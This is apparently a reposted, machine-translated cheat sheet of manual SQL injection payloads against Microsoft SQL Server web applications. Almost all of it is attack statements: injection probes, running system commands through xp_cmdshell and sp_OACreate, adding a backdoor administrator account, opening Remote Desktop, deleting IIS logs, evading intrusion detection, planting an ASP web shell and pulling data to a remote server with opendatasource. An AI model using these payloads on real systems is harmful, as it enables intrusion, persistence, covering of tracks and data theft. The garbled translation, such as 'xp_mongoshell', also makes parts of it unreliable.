(Conversion-collection) MSSQL manual injection statement set

Source: Internet
Author: User
Tags server website

And exists (select * from sysobjects) // you can check whether it is MSSQL.

And exists (select * from tableName) // determines whether a table exists. tableName indicates the table name.

And 1 = (select @ VERSION) // MSSQL VERSION

And 1 = (select db_name () // Current Database Name

And 1 = (select @ servername) // local service name

And 1 = (select IS_SRVROLEMEMBER ('sysadmin') // determine whether the system administrator is

And 1 = (Select IS_MEMBER ('db _ owner') // determine whether the database permission is used

And 1 = (Select HAS_DBACCESS ('master') // checks whether the database has read permission.

And 1 = (select name from master. dbo. sysdatabases where dbid = 1) // storm database name DBID is 1, 2, 3 ....

; Declare @ d int // whether multiple rows are supported

And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ existing shell') // determine whether xp_existing shell exists

And 1 = (select count (*) FROM master. dbo. sysobjects where name = 'xp _ regread ') // check whether the XP_regread extended stored procedure has been deleted

User test who adds and deletes a SA permission: (the SA permission is required)

Exec master. dbo. sp_addlogin test, password

Exec master. dbo. sp_addsrvrolemember test, sysadmin

Stop or activate a service. (SA permission required)

Exec master.. xp_servicecontrol 'stop', 'schedule'

Exec master.. xp_servicecontrol 'start', 'schedule'

Violent website directory

Create table labeng (lala nvarchar (255), id int)

DECLARE @ result varchar (255) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into labeng (lala) values (@ result );

And 1 = (select top 1 lala from labeng) or and 1 = (select count (*) from labeng where lala> 1)

-----------------------------------------------------

 

Open 3389 under DOS and modify the port number

SC config termservice start = auto

Net start termservice

// Allow external connections

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v fDenyTSConnections/t REG_DWORD/d 0x0/f

// Port 3389 to port 80

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp"/v PortNumber/t REG_DWORD/d 80/f

SQL Server

 

Determine whether injection is allowed:

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6'

Http://www.targer.com/article.asp? Id = 6 and 1 = 1

Http://www.targer.com/article.asp? Id = 6 and 1 = 2

Http://www.targer.com/article.asp? Action = value' and 1 = 1

Http://www.targer.com/article.asp? Action = value' and 1 = 2

Searchpoints % 'and 1 = 1

Searchpoints % 'and 1 = 2

 

Determine the database type:

Http://www.targer.com/article.asp? Id = 6 and user> 0

Http://www.targer.com/article.asp? Id = 6 and (select count (*) from sysobjects)> 0

 

Query the current user data:

Article. asp? Id = 6 having 1 = 1 --

 

Columns in the current table:

Article. asp? Id = 6 group by admin. username having 1 = 1 --

Article. asp? Id = 6 group by admin. username, admin. password having 1 = 1 --

 

Arbitrary tables and columns:

And (select top 1 name from (select top N id, name from sysobjects where xtype = char (85) T order by id desc)> 1

And (select top col_name (object_id ('admin'), N) from sysobjects)> 1

 

Violent database data:

And (select top 1 password from admin where id = N)> 1

 

Modify data in the database:

; Update admin set password = 'oooooooo 'where username = 'xxx'

 

Add data in the database:

; Insert into admin values (xxx, Oooooooo )--

 

Delete database:

; Drop database webdata

 

Get the current database username: and user> 0

Get the current database name: and db_name ()> 0

Obtain the database version: and (select @ version)> 0

 

Determine whether multi-sentence queries are supported:; declare @ a int --

Determine whether subqueries are supported: and (select count (1) from [sysobjects])> = 0

 

Extended database Stored Procedure: exec master .. xp_mongoshell

View the directory of server c:; exec_master .. xp_mongoshell 'dir c :\'

Determine whether the extended stored procedure exists: and select count (*) from master. dbo. sysobjects where xtype = 'X' and name = 'xp _ shortshell'

Restore extended stored procedure:; exec sp_addextendedproc xp_mongoshell, 'xp log70. dll'

Delete the extended stored procedure:; exec sp_dropextendedproc 'xp _ export shell'

 

MSSQL2000 provides some functions for indirectly obtaining permissions to access OLE objects:

; Declare @ s int

; Exec sp_oacreat 'wscript. shell', @ s

; Exec master .. spoamethod @s,'run', null,'cmd.exe/c dir c :\'

 

Determine whether the current database user name has high permissions:

And 1 = (select is_srvrolemember ('sysadmin '))

And 1 = (select is_srvrolemember ('serveradmin '))

And 1 = (select is_srvrolemember ('setupadmin '))

And 1 = (select is_srvrolemember ('securityadmin '))

And 1 = (select is_srvrolemember ('diskadmin '))

And 1 = (select is_srvrolemember ('bulkadmin '))

 

Determine whether the current database user name is DB_OWNER:

And 1 = (select is_member ('db _ owner '))

 

All database information in the SQLSERVER database system is stored in the master. dbo. sysdatabases table of SQLSERVER. You only need the PUBLIC permission to SELECT the table:

And (select top 1 name from master. dbo. sysdatabase order by dbid)> 0

And (select top 1 name from master. dbo. sysdatabase where name not in (select top 1 name from master. dbo. sysdatabases order by dbid)> 0

 

Delete log records:

; Exec master. dbo. xp_cmdshell 'del c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'

 

Replace log records:

Exec master. dbo. xp_mongoshell 'Copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'

 

Obtain the WEB path:

; Declare @ shell int

; Exec master .. sp_oamethod 'wscript. shell', @ shell out

; Exec master .. sp_oamethod @shell,'run', null,'cmd.exe/c dir/s d:/index. asp> c:/log.txt

 

Search by XP_CMDSHELL:

; Exec master .. xp_mongoshell 'dir/s d:/index. asp'

 

Command for displaying server website configuration information:

Cmd/c cscript.exe c: \ inetpub \ adminscript \ adsutil. vbs enum w3svc/1/root

Cmd/c cscript.exe c: \ inetpub \ adminscript \ adsutil. vbs enum w3svc/2/root

 

Use XP_REGREAD to read data with PUBLIC permissions:

; Exec master. dbo. xp_regread

Hkey_local_machine,

'System \ currentcontrolset \ services \ w3svc \ parameters \ virtual roots \'

'/'

 

For more information about the advanced technologies of SQLSERVER, see chapter 5 of proficient script hacker by Zeng yunhao.

 

3. DSqlHelper

 

Check permission SYSADMIN:

And 1 = (select IS_SRVROLEMEMBER ('sysadmin '))

Serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.

 

Check XP_CMDSHELL (CMD command ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ mongoshell ')

Check XP_REGREAD (Registry READ function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ regread ')

Check SP_MAKEWEBTASK (backup function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ makewebtask ')

Test SP_ADDEXTENDEDPROC:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ addextendedproc ')

Check the XP_SUBDIRS read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ subdirs ')

Check the XP_DIRTREE read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'xp _ dirtree ')

 

Modification content:

; UPDATE table name set field = content where 1 = 1

 

Xp_mongoshell Detection:

; Exec master .. xp_mongoshell 'dir c :\'

Fix XP_CMDSHELL:

; Exec master. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll'

Use XP_CMDSHELL to add a user hacker:

; Exec master. dbo. xp_mongoshell 'net user hacker 123456/add'

Xp_mongoshell adds the user hacker to the ADMIN group:

; Exec master. dbo. xp_mongoshell 'net localgroup administrators hacker/add'

 

Create Table test:

; Create table [dbo]. [test] ([dstr] [char] (255 ));

Test:

And exists (select * from test)

Location for reading the WEB (read the Registry ):

; DECLARE @ result varchar (255) EXEC master. dbo. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System \ ControlSet001 \ Services \ W3SVC \ Parameters \ Virtual Roots', '/', @ result output insert into test (dstr) values (@ result );--

The absolute path of the WEB is exposed (the explicit error mode ):

And 1 = (select count (*) from test where dstr> 1)

Delete table test:

; Drop table test ;--

 

Create a table dirs to view the directory:

; Create table dirs (paths varchar (100), id int)

Add the contents of the viewed directory to the dirs table:

; Insert dirs exec master. dbo. xp_dirtree 'C :\'

Burst directory content dirs:

And 0 <> (select top 1 paths from dirs)

Backup database DATANAME:

Declare @ a sysname; set @ a = db_name (); backup DATANAME @ a to disk = 'C: \ inetpub \ wwwroot \ down. bak ';--

Delete table dirs:

; Drop table dirs ;--

 

Create Table temp:

; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--

Add the drive disk list to the temp table:

; Insert temp exec master. dbo. xp_availablemedia ;--

Delete table temp:

; Delete from temp ;--

 

Create Table dirs:

; Create table dirs (paths varchar (100), id int );--

Obtain the subdirectory list XP_SUBDIRS:

; Insert dirs exec master. dbo. xp_subdirs 'C :\';--

Burst content (explicit error mode ):

And 0 <> (select top 1 paths from dirs)

Delete table dirs:

; Delete from dirs ;--

 

Create Table dirs:

; Create table dirs (paths varchar (100), id int )--

Use XP_CMDSHELL to view the directory content:

; Insert dirs exec master .. xp_mongoshell 'dir c :\'

Delete table dirs:

; Delete from dirs ;--

 

Check SP_OAcreate (Execute Command ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = 'SP _ OAcreate ')

SP_OAcreate:

; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net user hacker 123456/add'

SP_OAcreate directory:

; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C md E: \ XkCmsV \ webForm \ 1111'

Create a virtual directory edisk:

; Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ mkwebdir. vbs-w "Default Web site"-v "e", "e :\"'

Set virtual directory E to readable:

; Declare @ o int exec sp_oacreate 'wscript. shell ', @ o out exec sp_oamethod @ o, 'run', NULL, 'cscript.exe c: \ inetpub \ wwwroot \ chaccess. vbs-a w3svc/1/ROOT/e + browse'

Start the SERVER Service:

; Exec master .. xp_servicecontrol 'start', 'server'

Attackers can bypass IDS detection xp_javasshell:

; Declare @ a sysname set @ a = 'xp _ '+ 'your shell' exec @ a' dir c :\'

Enable remote database 1:

; Select * from OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123 ', 'select * from table1 ')

Enable remote database 2:

; Select * from OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1, 1433; ', 'select * from table'

// Check the permissions.

And 1 = (Select IS_MEMBER ('db _ owner '))

And char (124) % 2 BCast (IS_MEMBER ('db _ owner') as varchar (1) % 2 Bchar (124) = 1 ;--

// Check whether you have the permission to read a database

And 1 = (Select HAS_DBACCESS ('master '))

And char (124) % 2 BCast (HAS_DBACCESS ('master') as varchar (1) % 2 Bchar (124) = 1 --

 

Numeric type

And char (124) % 2 Buser % 2 Bchar (124) = 0

Character Type

'And char (124) % 2 Buser % 2 Bchar (124) = 0 and ''='

Search type

'And char (124) % 2 Buser % 2 Bchar (124) = 0 and' % '='

Brute-force Username

And user> 0

'And user> 0 and ''='

Check whether the permission is SA

And 1 = (select IS_SRVROLEMEMBER ('sysadmin '));--

And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 --

Check whether MSSQL database is used

And exists (select * from sysobjects );--

Check whether multiple rows are supported

; Declare @ d int ;--

Restore xp_mongoshell

; Exec master .. dbo. sp_addextendedproc 'xp _ mongoshell', 'xp log70. dll ';--

 

Select * from openrowset ('sqloledb', 'server = 192.168.1.200, 1433; uid = test; pwd = pafsp', 'select @ version ')

//-----------------------

// Execute the command

//-----------------------

First, enable the sandbox mode:

Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1

Then run the system command using jet. oledb.

Select * from openrowset ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ ias. mdb ', 'select shell ("cmd.exe/c net user admin admin1234/add ")')

Execute Command

; DECLARE @ shell int exec SP_OAcreate 'wscript. shell ', @ shell output exec SP_OAMETHOD @ shell, 'run', null, 'c: \ WINNT \ system32 \ cmd.exe/C net user paf pafpaf/add ';--

EXEC [master]. [dbo]. [xp_mongoshell] 'COMMAND/c md c: \ 8080'

Determine whether the xp_mongoshell extended storage process exists:

Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ Your shell ')

Write registry

Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Jet \ 4.0 \ Engines', 'sandboxmode', 'reg _ dword', 1

REG_SZ

Read Registry

Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon', 'userinit'

Read directory content

Exec master .. xp_dirtree 'C: \ winnt \ system32 \ ', 1, 1

 

Database Backup

Backup database pubs to disk = 'C: \ 123. Bak'

// Burst length

And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0 ;--

To change the sa password, run the following command:

Exec sp_password NULL, 'new password', 'sa'

Test:

Exec master. dbo. sp_addlogin test, ptlove

Exec master. dbo. sp_addsrvrolemember test, sysadmin

Delete the xp_mongoshell statement in the extended stored procedure:

Exec sp_dropextendedproc 'xp _ export shell'

Added extended storage process

EXEC [master] .. sp_addextendedproc 'xp _ proxiedadata', 'c: \ winnt \ system32 \ sqllog. dll'

GRANT exec On xp_proxiedadata TO public

 

Stop or activate a service.

Exec master.. xp_servicecontrol 'stop', 'schedule'

Exec master.. xp_servicecontrol 'start', 'schedule'

Dbo. xp_subdirs

Only list subdirectories in a directory.

Xp_getfiledetails 'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp'

Dbo. xp_makecab

Compress multiple target files to a specific target file.

All files to be compressed can be connected to the end of the parameter column and separated by commas.

Dbo. xp_makecab

'C: \ test. cab', 'mszip ', 1,

'C: \ Inetpub \ wwwroot \ SQLInject \ login. asp ',

'C: \ Inetpub \ wwwroot \ SQLInject \ securelogin. asp'

Xp_terminate_process

Stop a program in execution, but assign the Process ID parameter.

Select "View"-"select field" in the "Work administrator" menu to view the Process ID of each execution program.

Xp_terminate_process 2484

Xp_unpackcab

Uncompress the file.

Xp_unpackcab 'C: \ test. cab', 'c: \ temp ', 1

 

A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed, and net.exe did not exist. There is no way to use regedit/e to import the registration file, but mssql is the sa permission. Execute the master using the following command. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'parameter ', 'reg _ BINARY', 0x02ba5e187e2589be6f80da0046aa7e3c, you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'System \ RAdmin \ v2.0 \ Server \ Parameters', 'Port', 'reg _ BINARY ', and 0xd20400 change port value to 1234

Create database lcx;

Create TABLE ku (name nvarchar (256) null );

Create TABLE biao (id int NULL, name nvarchar (256) null );

// Obtain the Database Name

Insert into opendatasource ('sqloledb', 'server = 211.39.145.163, 1443; uid = test; pwd = pafpaf; database = lcx '). lcx. dbo. ku select name from master. dbo. sysdatabases

 

// Create a table in the Master to check the Permissions

Create TABLE master .. D_TEST (id nvarchar (4000) NULL, Data nvarchar (4000) NULL );--

Use sp_makewebtask to directly write a sentence in the web directory:

Http: // 127.0.0.1/dblogin123.asp? Username = 123 '; exec % 20sp_makewebtask % 20 'd: \ www \ tt \ 88. asp ',' % 20 select % 20 ''<% 25 execute (request (" a ") % 25>'' % 20 ';--

// Update table content

Update films SET kind = 'dramatic 'Where id = 123

// Delete content

Delete from table_name where Stockid = 3

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.